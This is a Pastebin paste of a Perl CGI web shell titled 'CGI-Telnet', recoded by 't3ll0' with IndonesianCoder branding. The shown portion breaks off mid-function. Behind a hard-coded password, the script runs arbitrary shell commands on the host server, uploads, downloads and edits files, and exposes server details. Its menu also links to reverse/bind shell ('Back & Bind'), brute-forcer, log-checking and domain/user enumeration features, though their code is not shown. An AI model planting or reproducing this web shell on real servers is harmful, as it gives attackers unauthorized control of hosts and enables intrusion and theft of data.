t3ll0

CGI- Version 1.4 2014

Jan 21st, 2014
93
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/perl -I/usr/local/bandmin
  2. use MIME::Base64;
  3. $Version= "CGI-Telnet Version 1.3";
  4. $EditPersion="<font style='text-shadow: 0px 0px 6px rgb(255, 0, 0), 0px 0px 5px rgb(300, 0, 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff; font-weight:bold;'><img src='http://indonesiancoder.com//images/xbannerx.gif'></font>";
  5.  
  6. $Password = "bismillah"; # Change this. You will need to enter this
  7. # to login.
  8. sub Is_Win(){
  9. $os = &trim($ENV{"SERVER_SOFTWARE"});
  10. if($os =~ m/win/i){
  11. return 1;
  12. }
  13. else{
  14. return 0;
  15. }
  16. }
  17. $WinNT = &Is_Win(); # You need to change the value of this to 1 if
  18. # you're running this script on a Windows NT
  19. # machine. If you're running it on Unix, you
  20. # can leave the value as it is.
  21.  
  22. $NTCmdSep = "&"; # This character is used to seperate 2 commands
  23. # in a command line on Windows NT.
  24.  
  25. $UnixCmdSep = ";"; # This character is used to seperate 2 commands
  26. # in a command line on Unix.
  27.  
  28. $CommandTimeoutDuration = 10000; # Time in seconds after commands will be killed
  29. # Don't set this to a very large value. This is
  30. # useful for commands that may hang or that
  31. # take very long to execute, like "find /".
  32. # This is valid only on Unix servers. It is
  33. # ignored on NT Servers.
  34.  
  35. $ShowDynamicOutput = 1; # If this is 1, then data is sent to the
  36. # browser as soon as it is output, otherwise
  37. # it is buffered and send when the command
  38. # completes. This is useful for commands like
  39. # ping, so that you can see the output as it
  40. # is being generated.
  41.  
  42. # DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!
  43.  
  44. $CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
  45. $CmdPwd = ($WinNT ? "cd" : "pwd");
  46. $PathSep = ($WinNT ? "\\" : "/");
  47. $Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
  48. $cols= 150;
  49. $rows= 26;
  50. #------------------------------------------------------------------------------
  51. # Reads the input sent by the browser and parses the input variables. It
  52. # parses GET, POST and multipart/form-data that is used for uploading files.
  53. # The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
  54. # Other variables can be accessed using $in{'var'}, where var is the name of
  55. # the variable. Note: Most of the code in this function is taken from other CGI
  56. # scripts.
  57. #------------------------------------------------------------------------------
  58. sub ReadParse
  59. {
  60. local (*in) = @_ if @_;
  61. local ($i, $loc, $key, $val);
  62.  
  63. $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
  64.  
  65. if($ENV{'REQUEST_METHOD'} eq "GET")
  66. {
  67. $in = $ENV{'QUERY_STRING'};
  68. }
  69. elsif($ENV{'REQUEST_METHOD'} eq "POST")
  70. {
  71. binmode(STDIN) if $MultipartFormData & $WinNT;
  72. read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
  73. }
  74.  
  75. # handle file upload data
  76. if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
  77. {
  78. $Boundary = '--'.$1; # please refer to RFC1867
  79. @list = split(/$Boundary/, $in);
  80. $HeaderBody = $list[1];
  81. $HeaderBody =~ /\r\n\r\n|\n\n/;
  82. $Header = $`;
  83. $Body = $';
  84. $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
  85. $in{'filedata'} = $Body;
  86. $Header =~ /filename=\"(.+)\"/;
  87. $in{'f'} = $1;
  88. $in{'f'} =~ s/\"//g;
  89. $in{'f'} =~ s/\s//g;
  90.  
  91. # parse trailer
  92. for($i=2; $list[$i]; $i++)
  93. {
  94. $list[$i] =~ s/^.+name=$//;
  95. $list[$i] =~ /\"(\w+)\"/;
  96. $key = $1;
  97. $val = $';
  98. $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
  99. $val =~ s/%(..)/pack("c", hex($1))/ge;
  100. $in{$key} = $val;
  101. }
  102. }
  103. else # standard post data (url encoded, not multipart)
  104. {
  105. @in = split(/&/, $in);
  106. foreach $i (0 .. $#in)
  107. {
  108. $in[$i] =~ s/\+/ /g;
  109. ($key, $val) = split(/=/, $in[$i], 2);
  110. $key =~ s/%(..)/pack("c", hex($1))/ge;
  111. $val =~ s/%(..)/pack("c", hex($1))/ge;
  112. $in{$key} .= "\0" if (defined($in{$key}));
  113. $in{$key} .= $val;
  114. }
  115. }
  116. }
  117.  
  118. #------------------------------------------------------------------------------
  119. # Prints the HTML Page Header
  120. # Argument 1: Form item name to which focus should be set
  121. #------------------------------------------------------------------------------
  122. sub PrintPageHeader
  123. {
  124. $EncodedCurrentDir = $CurrentDir;
  125. $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
  126. my $dir =$CurrentDir;
  127. $dir=~ s/\\/\\\\/g;
  128. print "Content-type: text/html\n\n";
  129. print <<END;
  130. <html>
  131. <head>
  132. <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  133. <title>CGI-Shell</title>
  134.  
  135. $HtmlMetaHeader
  136.  
  137. </head>
  138. <style>
  139. body{
  140. font: 10pt Verdana;
  141. }
  142. tr {
  143. BORDER-RIGHT: #3e3e3e 1px solid;
  144. BORDER-TOP: #3e3e3e 1px solid;
  145. BORDER-LEFT: #3e3e3e 1px solid;
  146. BORDER-BOTTOM: #3e3e3e 1px solid;
  147. color: #ff9900;
  148. }
  149. td {
  150. BORDER-RIGHT: #3e3e3e 1px solid;
  151. BORDER-TOP: #3e3e3e 1px solid;
  152. BORDER-LEFT: #3e3e3e 1px solid;
  153. BORDER-BOTTOM: #3e3e3e 1px solid;
  154. color: #2BA8EC;
  155. font: 10pt Verdana;
  156. }
  157.  
  158. table {
  159. BORDER-RIGHT: #3e3e3e 1px solid;
  160. BORDER-TOP: #3e3e3e 1px solid;
  161. BORDER-LEFT: #3e3e3e 1px solid;
  162. BORDER-BOTTOM: #3e3e3e 1px solid;
  163. BACKGROUND-COLOR: #111;
  164. }
  165.  
  166.  
  167. input {
  168. BORDER-RIGHT: #3e3e3e 1px solid;
  169. BORDER-TOP: #3e3e3e 1px solid;
  170. BORDER-LEFT: #3e3e3e 1px solid;
  171. BORDER-BOTTOM: #3e3e3e 1px solid;
  172. BACKGROUND-COLOR: Black;
  173. font: 10pt Verdana;
  174. color: #ff9900;
  175. }
  176.  
  177. input.submit {
  178. text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
  179. color: #FFFFFF;
  180. border-color: #009900;
  181. }
  182.  
  183. code {
  184. border : dashed 0px #333;
  185. BACKGROUND-COLOR: Black;
  186. font: 10pt Verdana bold;
  187. color: while;
  188. }
  189.  
  190. run {
  191. border : dashed 0px #333;
  192. font: 10pt Verdana bold;
  193. color: #FF00AA;
  194. }
  195.  
  196. textarea {
  197. BORDER-RIGHT: #3e3e3e 1px solid;
  198. BORDER-TOP: #3e3e3e 1px solid;
  199. BORDER-LEFT: #3e3e3e 1px solid;
  200. BORDER-BOTTOM: #3e3e3e 1px solid;
  201. BACKGROUND-COLOR: #1b1b1b;
  202. font: Fixedsys bold;
  203. color: #aaa;
  204. }
  205. A:link {
  206. COLOR: #2BA8EC; TEXT-DECORATION: none
  207. }
  208. A:visited {
  209. COLOR: #2BA8EC; TEXT-DECORATION: none
  210. }
  211. A:hover {
  212. text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
  213. color: #ff9900; TEXT-DECORATION: none
  214. }
  215. A:active {
  216. color: Red; TEXT-DECORATION: none
  217. }
  218.  
  219. .listdir tr:hover{
  220. background: #444;
  221. }
  222. .listdir tr:hover td{
  223. background: #444;
  224. text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
  225. color: #FFFFFF; TEXT-DECORATION: none;
  226. }
  227. .notline{
  228. background: #111;
  229. }
  230. .line{
  231. background: #222;
  232. }
  233. </style>
  234. <script language="javascript">
  235. function chmod_form(i,file)
  236. {
  237. /*var ajax='ajax_PostData("FormPerms_'+i+'","$ScriptLocation","ResponseData"); return false;';*/
  238. var ajax="";
  239. document.getElementById("FilePerms_"+i).innerHTML="<form name=FormPerms_" + i+ " action='' method='POST'><input id=text_" + i + " name=chmod type=text size=5 /><input type=submit class='submit' onclick='" + ajax + "' value=OK><input type=hidden name=a value='gui'><input type=hidden name=d value='$dir'><input type=hidden name=f value='"+file+"'></form>";
  240. document.getElementById("text_" + i).focus();
  241. }
  242. function rm_chmod_form(response,i,perms,file)
  243. {
  244. response.innerHTML = "<span onclick=\\\"chmod_form(" + i + ",'"+ file+ "')\\\" >"+ perms +"</span></td>";
  245. }
  246. function rename_form(i,file,f)
  247. {
  248. var ajax="";
  249. f.replace(/\\\\/g,"\\\\\\\\");
  250. var back="rm_rename_form("+i+",\\\""+file+"\\\",\\\""+f+"\\\"); return false;";
  251. document.getElementById("File_"+i).innerHTML="<form name=FormPerms_" + i+ " action='' method='POST'><input id=text_" + i + " name=rename type=text value= '"+file+"' /><input type=submit class='submit' onclick='" + ajax + "' value=OK><input type=submit class='submit' onclick='" + back + "' value=Cancel><input type=hidden name=a value='gui'><input type=hidden name=d value='$dir'><input type=hidden name=f value='"+file+"'></form>";
  252. document.getElementById("text_" + i).focus();
  253. }
  254. function rm_rename_form(i,file,f)
  255. {
  256. if(f=='f')
  257. {
  258. document.getElementById("File_"+i).innerHTML="<a href='?a=command&d=$dir&c=edit%20"+file+"%20'>" +file+ "</a>";
  259. }else
  260. {
  261. document.getElementById("File_"+i).innerHTML="<a href='?a=gui&d="+f+"'>[ " +file+ " ]</a>";
  262. }
  263. }
  264. </script>
  265. <body onLoad="document.f.@_.focus()" bgcolor="#0c0c0c" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
  266. <center><code>
  267. <table border="1" width="100%" cellspacing="0" cellpadding="2">
  268. <tr>
  269. <td align="center" rowspan=2>
  270. <b><font size="5">$EditPersion</font></b>
  271. </td>
  272.  
  273. <td>
  274.  
  275. <font face="Verdana" size="2">$ENV{"SERVER_SOFTWARE"}</font>
  276. </td>
  277. <td>Server IP:<font color="#cc0000"> $ENV{'SERVER_ADDR'}</font> | Your IP: <font color="#000000">$ENV{'REMOTE_ADDR'}</font>
  278. </td>
  279.  
  280. </tr>
  281.  
  282. <tr>
  283. <td colspan="3"><font face="Verdana" size="2">
  284. <a href="$ScriptLocation">Home</a> |
  285. <a href="$ScriptLocation?a=command&d=$EncodedCurrentDir">Command</a> |
  286. <a href="$ScriptLocation?a=gui&d=$EncodedCurrentDir">GUI</a> |
  287. <a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> |
  288. <a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |
  289.  
  290. <a href="$ScriptLocation?a=backbind">Back & Bind</a> |
  291. <a href="$ScriptLocation?a=bruteforcer">Brute Forcer</a> |
  292. <a href="$ScriptLocation?a=checklog">Check Log</a> |
  293. <a href="$ScriptLocation?a=domainsuser">Domains/Users</a> |
  294. <a href="$ScriptLocation?a=logout">Logout</a> |
  295. <a target='_blank' href="#">Help</a>
  296.  
  297. </font></td>
  298. </tr>
  299. </table>
  300. <font id="ResponseData" color="#ff99cc" >
  301. END
  302. }
  303.  
  304. #------------------------------------------------------------------------------
  305. # Prints the Login Screen
  306. #------------------------------------------------------------------------------
  307. sub PrintLoginScreen
  308. {
  309.  
  310. print <<END;
  311. <pre><script type="text/javascript">
  312. TypingText = function(element, interval, cursor, finishedCallback) {
  313. if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
  314. this.running = true; // Never run.
  315. return;
  316. }
  317. this.element = element;
  318. this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
  319. this.interval = (typeof interval == "undefined" ? 100 : interval);
  320. this.origText = this.element.innerHTML;
  321. this.unparsedOrigText = this.origText;
  322. this.cursor = (cursor ? cursor : "");
  323. this.currentText = "";
  324. this.currentChar = 0;
  325. this.element.typingText = this;
  326. if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
  327. TypingText.all.push(this);
  328. this.running = false;
  329. this.inTag = false;
  330. this.tagBuffer = "";
  331. this.inHTMLEntity = false;
  332. this.HTMLEntityBuffer = "";
  333. }
  334. TypingText.all = new Array();
  335. TypingText.currentIndex = 0;
  336. TypingText.runAll = function() {
  337. for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
  338. }
  339. TypingText.prototype.run = function() {
  340. if(this.running) return;
  341. if(typeof this.origText == "undefined") {
  342. setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval); // We haven't finished loading yet. Have patience.
  343. return;
  344. }
  345. if(this.currentText == "") this.element.innerHTML = "";
  346. // this.origText = this.origText.replace(/<([^<])*>/, ""); // Strip HTML from text.
  347. if(this.currentChar < this.origText.length) {
  348. if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
  349. this.tagBuffer = "<";
  350. this.inTag = true;
  351. this.currentChar++;
  352. this.run();
  353. return;
  354. } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
  355. this.tagBuffer += ">";
  356. this.inTag = false;
  357. this.currentText += this.tagBuffer;
  358. this.currentChar++;
  359. this.run();
  360. return;
  361. } else if(this.inTag) {
  362. this.tagBuffer += this.origText.charAt(this.currentChar);
  363. this.currentChar++;
  364. this.run();
  365. return;
  366. } else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
  367. this.HTMLEntityBuffer = "&";
  368. this.inHTMLEntity = true;
  369. this.currentChar++;
  370. this.run();
  371. return;
  372. } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
  373. this.HTMLEntityBuffer += ";";
  374. this.inHTMLEntity = false;
  375. this.currentText += this.HTMLEntityBuffer;
  376. this.currentChar++;
  377. this.run();
  378. return;
  379. } else if(this.inHTMLEntity) {
  380. this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
  381. this.currentChar++;
  382. this.run();
  383. return;
  384. } else {
  385. this.currentText += this.origText.charAt(this.currentChar);
  386. }
  387. this.element.innerHTML = this.currentText;
  388. this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "");
  389. this.currentChar++;
  390. setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
  391. } else {
  392. this.currentText = "";
  393. this.currentChar = 0;
  394. this.running = false;
  395. this.finishedCallback();
  396. }
  397. }
  398. </script>
  399. </pre>
  400.  
  401. <font style="font: 15pt Verdana; color: yellow;">Recoded By t3ll0</font><br><br>
  402. <table align="center" border="1" width="600" heigh>
  403. <tbody><tr>
  404. <td valign="top" background="http://dl.dropbox.com/u/10860051/images/matran.gif"><p id="hack" style="margin-left: 3px;">
  405. <font color="#009900"> Please Wait . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .</font> <br>
  406.  
  407. <font color="#009900"> Trying connect to Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .</font><br>
  408. <font color="#F00000"><font color="#FFF000">~\$</font> Connected ! </font><br>
  409. <font color="#009900"><font color="#FFF000">$ServerName~</font> Checking Server . . . . . . . . . . . . . . . . . . .</font> <br>
  410.  
  411. <font color="#009900"><font color="#FFF000">$ServerName~</font> Trying connect to Command . . . . . . . . . . .</font><br>
  412.  
  413. <font color="#F00000"><font color="#FFF000">$ServerName~</font>\$ Connected Command! </font><br>
  414. <font color="#009900"><font color="#FFF000">$ServerName~<font color="#F00000">\$</font></font> OK! You can kill it!</font>
  415. </tr>
  416. </tbody></table>
  417. <br>
  418.  
  419. <script type="text/javascript">
  420. new TypingText(document.getElementById("hack"), 30, function(i){ var ar = new Array("_",""); return " " + ar[i.length % ar.length]; });
  421. TypingText.runAll();
  422.  
  423. </script>
  424. END
  425. }
  426.  
  427. #------------------------------------------------------------------------------
  428. # Add html special chars
  429. #------------------------------------------------------------------------------
  430. sub HtmlSpecialChars($){
  431. my $text = shift;
  432. $text =~ s/&/&amp;/g;
  433. $text =~ s/"/&quot;/g;
  434. $text =~ s/'/&#039;/g;
  435. $text =~ s/</&lt;/g;
  436. $text =~ s/>/&gt;/g;
  437. return $text;
  438. }
  439. #------------------------------------------------------------------------------
  440. # Add link for directory
  441. #------------------------------------------------------------------------------
  442. sub AddLinkDir($)
  443. {
  444. my $ac=shift;
  445. my @dir=();
  446. if($WinNT)
  447. {
  448. @dir=split(/\\/,$CurrentDir);
  449. }else
  450. {
  451. @dir=split("/",&trim($CurrentDir));
  452. }
  453. my $path="";
  454. my $result="";
  455. foreach (@dir)
  456. {
  457. $path .= $_.$PathSep;
  458. $result.="<a href='?a=".$ac."&d=".$path."'>".$_.$PathSep."</a>";
  459. }
  460. return $result;
  461. }
  462. #------------------------------------------------------------------------------
  463. # Prints the message that informs the user of a failed login
  464. #------------------------------------------------------------------------------
  465. sub PrintLoginFailedMessage
  466. {
  467. print <<END;
  468. <br>Login : Administrator<br>
  469.  
  470. Password:<br>
  471. Login incorrect<br><br>
  472. END
  473. }
  474.  
  475. #------------------------------------------------------------------------------
  476. # Prints the HTML form for logging in
  477. #------------------------------------------------------------------------------
  478. sub PrintLoginForm
  479. {
  480. print <<END;
  481. <form name="f" method="POST" action="$ScriptLocation">
  482. <input type="hidden" name="a" value="login">
  483. Login : Administrator<br>
  484. Password:<input type="password" name="p">
  485. <input class="submit" type="submit" value="Enter">
  486. </form>
  487. END
  488. }
  489.  
  490. #------------------------------------------------------------------------------
  491. # Prints the footer for the HTML Page
  492. #------------------------------------------------------------------------------
  493. sub PrintPageFooter
  494. {
  495. print "<br><font color=red>o---[ <font color=#ff9900>IndonesianCoder vs Mc-Crew </font> ]---o</font></code></center></body></html>";
  496. }
  497.  
  498. #------------------------------------------------------------------------------
  499. # Retreives the values of all cookies. The cookies can be accesses using the
  500. # variable $Cookies{''}
  501. #------------------------------------------------------------------------------
  502. sub GetCookies
  503. {
  504. @httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
  505. foreach $cookie(@httpcookies)
  506. {
  507. ($id, $val) = split(/=/, $cookie);
  508. $Cookies{$id} = $val;
  509. }
  510. }
  511.  
  512. #------------------------------------------------------------------------------
  513. # Prints the screen when the user logs out
  514. #------------------------------------------------------------------------------
  515. sub PrintLogoutScreen
  516. {
  517. }
  518.  
  519. #------------------------------------------------------------------------------
  520. # Logs out the user and allows the user to login again
  521. #------------------------------------------------------------------------------
  522. sub PerformLogout
  523. {
  524. print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
  525. &PrintPageHeader("p");
  526. &PrintLogoutScreen;
  527.  
  528. &PrintLoginScreen;
  529. &PrintLoginForm;
  530. &PrintPageFooter;
  531. exit;
  532. }
  533.  
  534. #------------------------------------------------------------------------------
  535. # This function is called to login the user. If the password matches, it
  536. # displays a page that allows the user to run commands. If the password doens't
  537. # match or if no password is entered, it displays a form that allows the user
  538. # to login
  539. #------------------------------------------------------------------------------
  540. sub PerformLogin
  541. {
  542. if($LoginPassword eq $Password) # password matched
  543. {
  544. print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
  545. &PrintPageHeader;
  546. print &ListDir;
  547. }
  548. else # password didn't match
  549. {
  550. &PrintPageHeader("p");
  551. &PrintLoginScreen;
  552. if($LoginPassword ne "") # some password was entered
  553. {
  554. &PrintLoginFailedMessage;
  555.  
  556. }
  557. &PrintLoginForm;
  558. &PrintPageFooter;
  559. exit;
  560. }
  561. }
  562.  
  563. #------------------------------------------------------------------------------
  564. # Prints the HTML form that allows the user to enter commands
  565. #------------------------------------------------------------------------------
  566. sub PrintCommandLineInputForm
  567. {
  568. my $dir= "<span style='font: 11pt Verdana; font-weight: bold;'>".&AddLinkDir("command")."</span>";
  569. $Prompt = $WinNT ? "$dir > " : "<font color='#66ff66'>[admin\@$ServerName $dir]\$</font> ";
  570. return <<END;
  571. <form name="f" method="POST" action="$ScriptLocation">
  572.  
  573. <input type="hidden" name="a" value="command">
  574.  
  575. <input type="hidden" name="d" value="$CurrentDir">
  576. $Prompt
  577. <input type="text" size="50" name="c">
  578. <input class="submit"type="submit" value="Enter">
  579. </form>
  580. END
  581. }
  582.  
  583. #------------------------------------------------------------------------------
  584. # Prints the HTML form that allows the user to download files
  585. #------------------------------------------------------------------------------
  586. sub PrintFileDownloadForm
  587. {
  588. my $dir = &AddLinkDir("download");
  589. $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ ";
  590. return <<END;
  591. <form name="f" method="POST" action="$ScriptLocation">
  592. <input type="hidden" name="d" value="$CurrentDir">
  593. <input type="hidden" name="a" value="download">
  594. $Prompt download<br><br>
  595. Filename: <input class="file" type="text" name="f" size="35"><br><br>
  596. Download : <input class="submit" type="submit" value="Begin">
  597.  
  598. </form>
  599. END
  600. }
  601.  
  602. #------------------------------------------------------------------------------
  603. # Prints the HTML form that allows the user to upload files
  604. #------------------------------------------------------------------------------
  605. sub PrintFileUploadForm
  606. {
  607. my $dir= &AddLinkDir("upload");
  608. $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ ";
  609. return <<END;
  610. <form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
  611. $Prompt upload<br><br>
  612. Filename: <input class="file" type="file" name="f" size="35"><br><br>
  613. Options: &nbsp;<input type="checkbox" name="o" id="up" value="overwrite">
  614. <label for="up">Overwrite if it Exists</label><br><br>
  615. Upload :&nbsp;&nbsp;&nbsp;<input class="submit" type="submit" value="Begin">
  616. <input type="hidden" name="d" value="$CurrentDir">
  617. <input class="submit" type="hidden" name="a" value="upload">
  618.  
  619. </form>
  620.  
  621. END
  622. }
  623.  
  624. #------------------------------------------------------------------------------
  625. # This function is called when the timeout for a command expires. We need to
  626. # terminate the script immediately. This function is valid only on Unix. It is
  627. # never called when the script is running on NT.
  628. #------------------------------------------------------------------------------
  629. sub CommandTimeout
  630. {
  631. if(!$WinNT)
  632. {
  633. alarm(0);
  634. return <<END;
  635. </textarea>
  636. <br><font color=yellow>
  637. Command exceeded maximum time of $CommandTimeoutDuration second(s).</font>
  638. <br><font size='6' color=red>Killed it!</font>
  639. END
  640. }
  641. }
  642.  
  643.  
  644.  
  645. #------------------------------------------------------------------------------
  646. # This function displays the page that contains a link which allows the user
  647. # to download the specified file. The page also contains a auto-refresh
  648. # feature that starts the download automatically.
  649. # Argument 1: Fully qualified filename of the file to be downloaded
  650. #------------------------------------------------------------------------------
  651. sub PrintDownloadLinkPage
  652. {
  653. local($FileUrl) = @_;
  654. my $result="";
  655. if(-e $FileUrl) # if the file exists
  656. {
  657. # encode the file link so we can send it to the browser
  658. $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
  659. $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
  660. $HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
  661. &PrintPageHeader("c");
  662. $result .= <<END;
  663. Sending File $TransferFile...<br>
  664.  
  665. If the download does not start automatically,
  666. <a href="$DownloadLink">Click Here</a>
  667. END
  668. $result .= &PrintCommandLineInputForm;
  669. }
  670. else # file doesn't exist
  671. {
  672. $result .= "Failed to download $FileUrl: $!";
  673. $result .= &PrintFileDownloadForm;
  674. }
  675. return $result;
  676. }
  677.  
  678. #------------------------------------------------------------------------------
  679. # This function reads the specified file from the disk and sends it to the
  680. # browser, so that it can be downloaded by the user.
  681. # Argument 1: Fully qualified pathname of the file to be sent.
  682. #------------------------------------------------------------------------------
  683. sub SendFileToBrowser
  684. {
  685. my $result = "";
  686. local($SendFile) = @_;
  687. if(open(SENDFILE, $SendFile)) # file opened for reading
  688. {
  689. if($WinNT)
  690. {
  691. binmode(SENDFILE);
  692. binmode(STDOUT);
  693. }
  694. $FileSize = (stat($SendFile))[7];
  695. ($Filename = $SendFile) =~ m!([^/^\\]*)$!;
  696. print "Content-Type: application/x-unknown\n";
  697. print "Content-Length: $FileSize\n";
  698. print "Content-Disposition: attachment; filename=$1\n\n";
  699. print while(<SENDFILE>);
  700. close(SENDFILE);
  701. exit(1);
  702. }
  703. else # failed to open file
  704. {
  705. $result .= "Failed to download $SendFile: $!";
  706. $result .=&PrintFileDownloadForm;
  707. }
  708. return $result;
  709. }
  710.  
  711.  
  712. #------------------------------------------------------------------------------
  713. # This function is called when the user downloads a file. It displays a message
  714. # to the user and provides a link through which the file can be downloaded.
  715. # This function is also called when the user clicks on that link. In this case,
  716. # the file is read and sent to the browser.
  717. #------------------------------------------------------------------------------
  718. sub BeginDownload
  719. {
  720. # get fully qualified path of the file to be downloaded
  721. if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
  722. (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
  723. {
  724. $TargetFile = $TransferFile;
  725. }
  726. else # path is relative
  727. {
  728. chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
  729. $TargetFile .= $PathSep.$TransferFile;
  730. }
  731.  
  732. if($Options eq "go") # we have to send the file
  733. {
  734. &SendFileToBrowser($TargetFile);
  735. }
  736. else # we have to send only the link page
  737. {
  738. &PrintDownloadLinkPage($TargetFile);
  739. }
  740. }
  741.  
  742. #------------------------------------------------------------------------------
  743. # This function is called when the user wants to upload a file. If the
  744. # file is not specified, it displays a form allowing the user to specify a
  745. # file, otherwise it starts the upload process.
  746. #------------------------------------------------------------------------------
  747. sub UploadFile
  748. {
  749. # if no file is specified, print the upload form again
  750. if($TransferFile eq "")
  751. {
  752. return &PrintFileUploadForm;
  753.  
  754. }
  755. my $result="";
  756. # start the uploading process
  757. $result .= "Uploading $TransferFile to $CurrentDir...<br>";
  758.  
  759. # get the fullly qualified pathname of the file to be created
  760. chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
  761. $TransferFile =~ m!([^/^\\]*)$!;
  762. $TargetName .= $PathSep.$1;
  763.  
  764. $TargetFileSize = length($in{'filedata'});
  765. # if the file exists and we are not supposed to overwrite it
  766. if(-e $TargetName && $Options ne "overwrite")
  767. {
  768. $result .= "Failed: Destination file already exists.<br>";
  769. }
  770. else # file is not present
  771. {
  772. if(open(UPLOADFILE, ">$TargetName"))
  773. {
  774. binmode(UPLOADFILE) if $WinNT;
  775. print UPLOADFILE $in{'filedata'};
  776. close(UPLOADFILE);
  777. $result .= "Transfered $TargetFileSize Bytes.<br>";
  778. $result .= "File Path: $TargetName<br>";
  779. }
  780. else
  781. {
  782. $result .= "Failed: $!<br>";
  783. }
  784. }
  785. $result .= &PrintCommandLineInputForm;
  786. return $result;
  787. }
  788.  
  789. #------------------------------------------------------------------------------
  790. # This function is called when the user wants to download a file. If the
  791. # filename is not specified, it displays a form allowing the user to specify a
  792. # file, otherwise it displays a message to the user and provides a link
  793. # through which the file can be downloaded.
  794. #------------------------------------------------------------------------------
  795. sub DownloadFile
  796. {
  797. # if no file is specified, print the download form again
  798. if($TransferFile eq "")
  799. {
  800. &PrintPageHeader("f");
  801. return &PrintFileDownloadForm;
  802. }
  803.  
  804. # get fully qualified path of the file to be downloaded
  805. if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) | (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
  806. {
  807. $TargetFile = $TransferFile;
  808. }
  809. else # path is relative
  810. {
  811. chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
  812. $TargetFile .= $PathSep.$TransferFile;
  813. }
  814.  
  815. if($Options eq "go") # we have to send the file
  816. {
  817. return &SendFileToBrowser($TargetFile);
  818. }
  819. else # we have to send only the link page
  820. {
  821. return &PrintDownloadLinkPage($TargetFile);
  822. }
  823. }
  824.  
  825.  
  826. #------------------------------------------------------------------------------
  827. # This function is called to execute commands. It displays the output of the
  828. # command and allows the user to enter another command. The change directory
  829. # command is handled differently. In this case, the new directory is stored in
  830. # an internal variable and is used each time a command has to be executed. The
  831. # output of the change directory command is not displayed to the users
  832. # therefore error messages cannot be displayed.
  833. #------------------------------------------------------------------------------
  834. sub ExecuteCommand
  835. {
  836. my $result="";
  837. if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
  838. {
  839. # we change the directory internally. The output of the
  840. # command is not displayed.
  841. $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
  842. chop($CurrentDir = `$Command`);
  843. $result .= &PrintCommandLineInputForm;
  844.  
  845. $result .= "Command: <run>$RunCommand </run><br><textarea cols='$cols' rows='$rows' spellcheck='false'>";
  846. # xuat thong tin khi chuyen den 1 thu muc nao do!
  847. $RunCommand= $WinNT?"dir":"dir -lia";
  848. $result .= &RunCmd;
  849. }elsif($RunCommand =~ m/^\s*edit\s+(.+)/)
  850. {
  851. $result .= &SaveFileForm;
  852. }else
  853. {
  854. $result .= &PrintCommandLineInputForm;
  855. $result .= "Command: <run>$RunCommand</run><br><textarea id='data' cols='$cols' rows='$rows' spellcheck='false'>";
  856. $result .=&RunCmd;
  857. }
  858. $result .= "</textarea>";
  859. return $result;
  860. }
  861.  
  862. #------------------------------------------------------------------------
  863. # run command
  864. #------------------------------------------------------------------------
  865.  
  866. sub RunCmd
  867. {
  868. my $result="";
  869. $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
  870. if(!$WinNT)
  871. {
  872. $SIG{'ALRM'} = \&CommandTimeout;
  873. alarm($CommandTimeoutDuration);
  874. }
  875. if($ShowDynamicOutput) # show output as it is generated
  876. {
  877. $|=1;
  878. $Command .= " |";
  879. open(CommandOutput, $Command);
  880. while(<CommandOutput>)
  881. {
